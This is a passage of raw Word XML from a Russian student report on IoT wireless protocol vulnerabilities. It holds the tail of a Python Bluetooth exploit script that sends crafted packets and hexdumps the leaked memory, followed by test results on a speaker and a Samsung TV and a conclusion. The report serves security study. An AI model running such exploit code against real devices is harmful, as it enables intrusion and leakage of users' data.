      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'Sending packet %d'</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> % </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7"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00"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sock.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(packet(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>service_short</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>, data[-3:]))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA6DC7" w:rsidRPr="0044023C"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eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="0044023C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>sock</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="0044023C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>recv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="0044023C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>mtu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="0044023C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA6DC7" w:rsidRPr="000B71E0" w:rsidRDefault="00880DF7" w:rsidP="00CA6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="000B71E0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> += </w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r w:rsidR="00CA6DC7" w:rsidRPr="000B71E0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>[9:-3]</w:t>
      </w:r>
      <w:r w:rsidR="000B71E0" w:rsidRPr="000B71E0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B71E0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>#Считываются элементы от 9 до 3 с конца (не включительно)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA6DC7" w:rsidRPr="000B71E0"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sock.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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roofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>p.success</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>'Done'</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA6DC7" w:rsidRPr="00CA6DC7" w:rsidRDefault="00CA6DC7" w:rsidP="00CA6DC7">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CA6DC7" w:rsidRPr="00CA6DC7" w:rsidRDefault="00CA6DC7" w:rsidP="00CA6DC7">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>hexdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CA6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F4393" w:rsidRDefault="00273B72" w:rsidP="003F5C29">
      <w:r>
        <w:t xml:space="preserve">Устройство оказалось уязвимо для </w:t>
      </w:r>
      <w:r w:rsidR="001F4393">
        <w:t>эксплоита. Так же проверить уязвимость устройства можно воспользовавшись специальным приложением от разработчика эксплоита</w:t>
      </w:r>
      <w:r w:rsidR="007B67FD">
        <w:t>.(Рисунок 16)</w:t>
      </w:r>
      <w:r w:rsidR="001F4393">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00273B72" w:rsidRDefault="001F4393" w:rsidP="001F4393">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1956089" cy="3477491"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:docPr id="24" name="Рисунок 24" descr="https://pp.userapi.com/c841133/v841133394/58f72/gvC2xlb18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p.userapi.com/c841133/v841133394/58f72/gvC2xlb18c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7464" cy="3497713"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B67FD" w:rsidRDefault="007B67FD" w:rsidP="001F4393">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 16 – проверка на уязвимость устройства </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C29" w:rsidRDefault="003F5C29" w:rsidP="003F5C29">
      <w:r>
        <w:t xml:space="preserve">Так же приложение может проверить видимые </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bluetooth</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5C29">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007B67FD">
        <w:t>устройства</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B67FD">
        <w:t xml:space="preserve">(рисунок 17) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C29" w:rsidRDefault="003F5C29" w:rsidP="003F5C29">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="003F5C29">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E322B57" wp14:editId="04EA0046">
            <wp:extent cx="1542087" cy="2643332"/>
            <wp:effectExtent l="0" t="0" r="127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7390" cy="2686705"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B67FD" w:rsidRDefault="007B67FD" w:rsidP="007B67FD">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 17 – проверка на уязвимость соседних  устройств</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B67FD" w:rsidRDefault="007B67FD" w:rsidP="003F5C29">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003F5C29" w:rsidRPr="007B67FD" w:rsidRDefault="007B67FD" w:rsidP="003F5C29">
      <w:r>
        <w:t xml:space="preserve">Приложение обнаружило беспроводную колонку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JBL</w:t>
      </w:r>
      <w:r w:rsidRPr="003F5C29">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Smart</w:t>
      </w:r>
      <w:r w:rsidRPr="007B67FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TV</w:t>
      </w:r>
      <w:r w:rsidRPr="007B67FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Samsung</w:t>
      </w:r>
      <w:r w:rsidRPr="007B67FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F5C29">
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JBL</w:t>
      </w:r>
      <w:r w:rsidRPr="007B67FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GO</w:t>
      </w:r>
      <w:r w:rsidR="003F5C29" w:rsidRPr="003F5C29">
        <w:t xml:space="preserve"> не подвержена уязвимости, в чем мы можем убедиться, запустив эксплойт.</w:t>
      </w:r>
      <w:r w:rsidRPr="007B67FD">
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Рисунок 18 ). Однако  телевизор </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>осображается</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> в списке уязвимых устройств ,так как работает на системе </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tyzen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B67FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,основанной на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F5C29" w:rsidRDefault="003F5C29" w:rsidP="003F5C29">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48963048" wp14:editId="28C95FB1">
            <wp:extent cx="5940425" cy="130746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307465"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B67FD" w:rsidRPr="007B67FD" w:rsidRDefault="007B67FD" w:rsidP="003F5C29">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 18 – эксплойт не сработал.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00273B72" w:rsidRDefault="001F4393" w:rsidP="00273B72">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc503991017"/>
      <w:r>
        <w:t>ЗАКЛЮЧЕНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="001F4393" w:rsidRPr="00273B72" w:rsidRDefault="00273B72" w:rsidP="001F4393">
      <w:r>
        <w:t xml:space="preserve">Были проанализированы некоторые протоколы </w:t>
      </w:r>
      <w:r w:rsidR="001F4393">
        <w:t>беспроводной</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> связи интернета вещей. Несмотря на всю современность методов защиты и шифрования некоторые протоколы остаются уязвимы для</w:t>
      </w:r>
      <w:r w:rsidR="001F4393" w:rsidRPr="001F4393">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F4393">
        <w:t xml:space="preserve">новых и новых </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0012765C" w:rsidRDefault="00273B72" w:rsidP="001F4393">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> эксплоитов </w:t>
      </w:r>
      <w:r w:rsidR="001F4393">
        <w:t>. Но производители устройств стараются активно</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F4393">
        <w:t>исправлять уязвимости ,чтобы не подвергать данные</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001F4393">
        <w:t>пользователей угрозе ,что мы увидели на примере уязвимости</w:t>
      </w:r>
      <w:r w:rsidR="00880DF7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F4393">
        <w:t>bluesnarfer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001F4393">
        <w:t>: современные устройства более не восприимчивы этому виду атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0012765C" w:rsidRDefault="0012765C" w:rsidP="0012765C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0012765C" w:rsidRDefault="0012765C" w:rsidP="0012765C">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc503991018"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>СПИСОК ИСПОЛЬЗУЕМЫХ ИСТОЧНИКОВ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00273B72" w:rsidRDefault="001A71B8" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Беспроводные технологии умного дома</w:t>
      </w:r>
      <w:r w:rsidR="0012765C" w:rsidRPr="001A71B8">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Электронный ресурс]. - Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r w:rsidRPr="00CE4E9E">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>http://xn--80aahfsmenmf.xn--p1ai/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00CE4E9E">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>index.php</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00CE4E9E">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r w:rsidRPr="00CE4E9E">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>articles</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidRPr="00CE4E9E">
          <w:rPr>
            <w:rStyle w:val="a6"/>
          </w:rPr>
          <w:t>/17-grp-002/105-tekhnologii-umnogo-doma</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0044023C" w:rsidRDefault="0044023C" w:rsidP="00390FED">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:numPr>
